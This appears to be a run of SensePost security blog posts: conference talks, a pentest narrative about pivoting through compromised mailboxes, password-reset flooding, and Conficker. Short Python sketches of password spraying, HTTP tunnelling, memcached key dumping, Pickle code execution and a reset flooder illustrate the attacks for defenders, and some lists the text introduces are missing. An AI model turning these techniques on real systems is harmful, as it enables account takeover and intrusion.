We recently gave a talk at the ITWeb Security Summit entitled "Offense Oriented Defence". The talk was targeted at defenders and auditors rather than hackers (the con is oriented that way), although it's odd that I feel the need to apologise for that ;)
The talk's primary point was that by understanding how attackers attack, more innovative defences can be imagined. The corollary was that common defences, in the form of "best practice", introduce commonality that is more easily exploited, or at least degrades over time as attackers adapt. Finally, many of these "security basics" are honestly hard, and we can't place the reliance on them we'd hoped. But our approach doesn't seem to want to acknowledge this, and much like an AA meeting, it's time we admitted we have a problem.
If you look at the average security strategy or budget, you often end up with a list containing a couple of these:
But the truth is that many of these items don't actually block attacks, and the few that do don't really counter the common bypasses used to side-step them. For example:
The current place we seem to be in is akin to having everyone build a wall. Attackers get to evaluate the wall, figure out how to get over it, and add to their capability (i.e. get a longer rope). But once they have a longer rope, they can use it over and over again, and against more than one wall. So attackers, who are quite good at sharing, get to keep building their toolchain, while all defenders can do is keep building a higher wall and maintaining the increasingly untenable structure. By understanding how attackers attack, we can break out of this and try more innovative approaches.
The talk is illustrated with four broad examples: Passwords, Patches, Anti-Virus and DMZs. For each, the beliefs around specific configurations are discussed, along with how those don't stand up to how attackers actually attack. For example, the way AV is believed to work doesn't seem to correspond with how easy it is to bypass, and the common configuration of standard password controls, such as lockout, doesn't seem to take horizontal brute-force attacks into account.
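To make the lockout point concrete, here's a minimal sketch (not from the talk; the in-memory "directory" and `try_login` check are toy stand-ins for a real authentication service) of a horizontal brute-force. Instead of hammering one account with many passwords, the attacker tries one password across many accounts, so no single account accumulates enough failures to trip a per-account lockout counter:

```python
# Illustrative sketch: a horizontal ("spray") brute-force tries ONE
# password across MANY accounts, staying under per-account lockout limits.

def horizontal_bruteforce(usernames, passwords, try_login):
    """Try each password across all accounts before moving to the next.

    try_login(user, pwd) -> bool is a placeholder for whatever
    authentication check the attacker is abusing.
    """
    hits = []
    for pwd in passwords:          # outer loop: passwords
        for user in usernames:     # inner loop: accounts
            if try_login(user, pwd):
                hits.append((user, pwd))
    return hits

# Toy demo against an in-memory "directory" with a lockout of 3 failures.
directory = {"alice": "Summer2013!", "bob": "P@ssw0rd", "carol": "hunter2"}
failures = {u: 0 for u in directory}

def try_login(user, pwd):
    if failures[user] >= 3:        # account locked out
        return False
    ok = directory[user] == pwd
    if not ok:
        failures[user] += 1        # each account only sees a few failures
    return ok

found = horizontal_bruteforce(directory.keys(), ["Summer2013!", "P@ssw0rd"], try_login)
print(found)
```

Two common passwords against three accounts yields two compromises, and no account ever saw more than two failed attempts, so the lockout never fired.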
The point I want to make here is somewhat subtle: if you walk away thinking I've described new attacks, then you've missed it; if you think I'm recommending "the basics", then you've also missed it. Truthfully, maybe it's just that I didn't make it very well ... decide for yourself, here are the slides:
You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.
Under the hood, the Zigbee and Z-Wave wireless communication protocols are the most commonly used RF technologies in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security research efforts. Z-Wave is a proprietary wireless protocol that operates in the Industrial, Scientific and Medical (ISM) radio band. It transmits on the 868.42 MHz (Europe) and 908.42 MHz (United States) frequencies, and is designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.
Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol, save for a DefCon 2011 talk in which the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and shows how the Z-Wave protocol can be subjected to attacks.
The talk is being presented by Behrang Fouladi, a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured out how to clone the SecurID software token.
Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:
Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller, and it caused a stir when we presented it in 2002. We were also very pleased when it was referenced in a 2004 book by Ed Skoudis.
A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually led to the creation of Maltego.
Our thinking around pentest automation, and in particular footprinting and link analysis, was further expanded upon. Here we also released the first version of our automated footprinting tool, "Bidiblah".
In this talk we literally did introduce two proxy tools. The first was "Suru", our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been surpassed by excellent tools like "Burp Proxy", it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.
The second proxy we introduced operated at the TCP layer, leveraging the excellent Scapy packet manipulation program. We never took that any further, however.
This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.
In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.
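The core idea behind reDuh can be sketched in a few lines. This is not reDuh's actual wire format (the real tool's framing and its JSP/PHP/ASP endpoints differ, and the endpoint name below is made up); it just shows the encapsulation trick: chunks of a TCP stream are base64-encoded into ordinary HTTP POSTs, which the uploaded server-side page decodes and relays to hosts behind the server:

```python
# Sketch of TCP-over-HTTP encapsulation (hypothetical framing, not
# reDuh's real protocol): each TCP chunk rides inside a valid HTTP POST.
import base64

def wrap(session_id, seq, payload):
    """Client side: encode one chunk of a TCP stream as an HTTP POST."""
    body = "sid=%s&seq=%d&data=%s" % (
        session_id, seq, base64.b64encode(payload).decode())
    return ("POST /tunnel.jsp HTTP/1.1\r\n"
            "Host: compromised.example\r\n"
            "Content-Length: %d\r\n\r\n%s" % (len(body), body))

def unwrap(http_request):
    """Server side: recover the raw TCP bytes to relay to the inner host."""
    body = http_request.split("\r\n\r\n", 1)[1]
    fields = dict(kv.split("=", 1) for kv in body.split("&"))
    return int(fields["seq"]), base64.b64decode(fields["data"])

# Round-trip one chunk, e.g. the banner of an internal SSH server.
req = wrap("s1", 0, b"SSH-2.0-OpenSSH_5.1\r\n")
seq, data = unwrap(req)
```

Because every chunk is a validly formed HTTP request, the traffic passes through web servers and proxies that would never allow a raw TCP connection inbound.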
Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in were discussed. The cloud offerings from Amazon, Salesforce and Apple, as well as their security, were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Dai Zovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.
This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers, and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped, and to date we've had almost 50,000 hits on the presentation on Slideshare.
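go-derper itself is a Ruby tool; this Python fragment only sketches the underlying trick it automates: memcached's plain-text protocol will enumerate cached keys via "stats items" followed by "stats cachedump <slab> <limit>" for anyone who can reach the port, and the ITEM lines it returns are trivial to parse:

```python
# Parse the key names out of a memcached "stats cachedump" response.
def parse_cachedump(response):
    """Each line looks like: ITEM <key> [<size> b; <expiry> s]"""
    keys = []
    for line in response.splitlines():
        if line.startswith("ITEM "):
            keys.append(line.split()[1])
    return keys

# Sample response in the format memcached uses on the wire:
sample = ("ITEM session:4f2a [312 b; 1370000000 s]\r\n"
          "ITEM user:42 [88 b; 0 s]\r\n"
          "END\r\n")
print(parse_cachedump(sample))   # → ['session:4f2a', 'user:42']
```

With the key names in hand, a plain `get <key>` retrieves each value, which is where the interesting data mining starts.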
Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however, there is no public Pickle exploitation guide, and published exploits are simple examples only. In this paper we described the Pickle environment, outlined hurdles facing a shellcoder and provided guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library. We also wrote a very fancy paper about it all...
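For readers who haven't seen the primitive the paper builds on, here it is in its simplest form: any object's `__reduce__` may return a `(callable, args)` pair, and unpickling invokes that callable. The demo below keeps things harmless by evaluating arithmetic where a real exploit would run a command:

```python
# The canonical Pickle code-execution primitive: __reduce__ returns
# (callable, args), and pickle.loads() calls it during deserialization.
import pickle

class Payload:
    def __reduce__(self):
        # A real exploit would return something like
        # (os.system, ("arbitrary command",)); harmless eval for the demo.
        return (eval, ("6 * 7",))

blob = pickle.dumps(Payload())   # attacker-controlled bytes
result = pickle.loads(blob)      # victim deserializes -> eval runs
print(result)                    # → 42
```

The catch, and the subject of the paper, is everything beyond this one-liner: surviving manglers, avoiding banned globals, and writing real shellcode within the constraints of the Pickle virtual machine.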
For this year's show we'll be back on the podium with Behrang's talk, as well as an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team, please consider one of our courses. We need all the support we can get, and we're pretty convinced you won't be disappointed.
See you in Vegas!
In light of recent mass hacks (HBGary, Sony, Nintendo, etc) one would have thought that collectively, companies would take notice and at least be slightly more aware of the potential implications vulnerabilities in public-facing services could have.
The problem appears to be that these hacks, and indeed hackers, aren't that technically superior and more often than not, take advantage of simple flaws. Some flaws, like SQL injection, provide so much access on their own that a fairly grim attack scenario can be painted. However, often attackers don't require such extravagant flaws to gain access. Chained attacks utilising "low risk" attacks can be far more deadly than a single flaw.
We had an interesting scenario recently which demonstrated this. This is one example of how we use these minor flaws to gain access, and it also shows how the house of cards can fall quite spectacularly when basic security principles are not adhered to. We were on a fairly bread-and-butter security assessment: perform an analysis of the target (a large multinational) and determine where their weaknesses were from an unauthenticated perspective. Increasingly, we advise against unauthenticated assessments as we feel we can offer more value when you assume the shell is already cracked, but this was a special case.
The web application was good; it soon became clear that the developers had followed guidelines for the development of secure applications and ensured that common attacks were indeed handled in a suitable manner. What they didn't do, however, was apply a stringent hardening process to the server itself, and as the platitude goes "security is only as good as the weakest link."
The analyst had already obtained all administrative user names and passwords (stored in a database with no protection at all) and had logged into a number of them to confirm access. My email, now forwarded in the clear, was sent to all involved with a stern "fix it". Since we had access to the mailboxes, we saw an admin send the reply: "..have changed the password. Ask them to check if the password is strong now, there's no way they can get in now."
Yes, the password was indeed strong and certainly constructed in a recommended manner, but the administrator's account was already compromised and we were monitoring communications. This wasn't an appropriate response; it's a bit like using AV to clean a virus from a box post-infection, instead of rebuilding it. Some data mining through multiple unencrypted mailboxes provided numerous credentials for other servers inside the network. We could pivot through the internal network to our hearts' content, while monitoring their comms to make sure our supply line wasn't under threat.
Takeaway I: Once an attacker is inside the perimeter, trying to control intruder access at the perimeter is a game you've already lost. i.e. Blocking the path in doesn't mean you've blocked the paths in use.
Starting with a simple directory listing flaw, one that Nessus rates as a "low" risk, the house of cards fell at an alarming rate. Security isn't about looking only at the high risks, because attackers won't limit themselves the same way.
To this end, different types of session identifiers were examined. The thinking was that by bruting session IDs instead of credentials, the monitoring systems might be less likely to pick up the attack, and the cloud gives the attacker vast amounts of bandwidth and processing power that was not previously available. However, even with access to cloud resources, most "strong" session IDs would still be large enough to avoid this attack (think 128-bit sessions such as those stored in ASP.NET cookies).
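A quick back-of-envelope check backs this up. Even granting the attacker a (generously assumed) sustained million guesses per second, a well-generated 128-bit identifier is hopeless:

```python
# Rough feasibility check on brute-forcing a 128-bit session ID.
keyspace = 2 ** 128                    # possible 128-bit identifiers
rate = 10 ** 6                         # assumed guesses per second
seconds_per_year = 60 * 60 * 24 * 365

# Expected time to hit a single valid ID is half the keyspace.
years = keyspace / (2 * rate * seconds_per_year)
print("%.1e years" % years)            # on the order of 10^24 years
```

Which is why the interesting targets are not the session IDs themselves, but the weaker tokens discussed next.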
Of course, authentication tokens are not necessarily only stored in session carriers such as cookies/urls/hidden fields. A number of sites use a randomly generated link to effect a password reset, and if these random links can be brute-forced then the attacker still gains access to the account.
Thus, in the following set of videos we show how an attacker can generate a huge number of password reset links, each of which is valid for the target account (he doesn't get to see the links). The final step would be to randomly guess links until one hits (left as an exercise for the reader).
Users can sign-up for free trial accounts and upload/store/share files via the web interface, which is where authentication is handled. There were also client-side options, but we didn't examine these.
Here we show how the password reset process works for SugarSync.
The next video is short, and shows the execution of a Python script that submits many password reset requests for a single account.
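A script of that shape needs very little. The sketch below is not the script from the video: the endpoint URL and form field are placeholders (not SugarSync's real ones), and the HTTP layer is injected so the loop itself is what's on display:

```python
# Sketch of a reset-request flooder. The URL and form field are
# hypothetical placeholders; send_post is whatever HTTP client you
# prefer (urllib, requests, ...).

def flood_resets(target_email, attempts, send_post):
    """Submit the password reset form `attempts` times for one account."""
    url = "https://example.com/reset"        # placeholder endpoint
    data = {"email": target_email}           # placeholder form field
    sent = 0
    for _ in range(attempts):
        send_post(url, data)                 # each POST triggers one reset
        sent += 1
    return sent

# Dry run against a recording stub instead of a live server.
log = []
count = flood_resets("victim@example.com", 5, lambda u, d: log.append((u, d)))
print(count)   # → 5
```

In the video the attempt count is in the thousands, which is what produces the flood of reset emails shown next.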
The final SugarSync video shows the masses of reset emails that were sent to the user.
Two items were of interest:
The recent widespread carnage caused by the Conficker worm is astounding, but is also comforting, in a strange way.
It has been a good few years since the world saw a worm outbreak of this magnitude. Indeed, since the Code Red, Slammer and Blaster days, things have been fairly quiet on the Interwebs front.
As a community, it seems we very quickly forgot the pains caused by these collective strains of evil. Many people proclaimed the end of issues of that particular bent, whether as a result of a rash of hasty post-worm panic-buying of preventative technologies and their relatives, or because more faith was placed in software vendors preventing easily "wormable" holes in their software.
Needless to say, Conficker turned those theories a little on their head. Wikipedia notes on the impact of the worm gleaned from various sources seem to say it all:
The New York Times reported that Conficker had infected 9 million PCs by 22 January 2009, while The Guardian estimated 3.5 million infected PCs. By 16 January 2009, antivirus software vendor F-Secure reported that Conficker had infected almost 9 million PCs. As of 26 January 2009, Conficker had infected more than 15 million computers, *making it one of the most widespread infections in recent times*.
We saw similar turmoil when a large organization in South Africa was hit incredibly hard by this worm, and was struggling to resolve the resulting chaos, even with the assistance of their security software vendors. Thankfully, it all ended happily for them, as the issue was resolved, but it's plain to see where this could go wrong and affect many organizations similarly.
I did mention up front that I found this all to be comforting (granted, this may be a slightly twisted viewpoint, but it really is how I feel about it). The reason I find this comforting is that perhaps as a collective, we needed a fresh wake-up call. They say that complacency kills, and I know that many organizations have become rather complacent of late...
Consider how Conficker works and spreads - missing patches leading to RPC-based buffer overflows in the Microsoft Server Service, brute-force attacks on weak passwords, spreading through file shares...hold on...does this sound at all familiar? Aren't these issues all addressed by security best practices 101?
Organizations that had adopted reasonably robust internal security measures - hardening and patching policies, internal security assessments, solid internal vulnerability and compliance management solutions - would have smiled through the Conficker onslaught.
I don't say this only because we play squarely in the assessment and vulnerability management spaces - I say it because the same steps that would have protected against Code Red, Slammer, Blaster and friends would have protected against Conficker... best practice 101.
I guess every now and then, we all need a reminder of just how essential the basics that we all tend to overlook actually are :>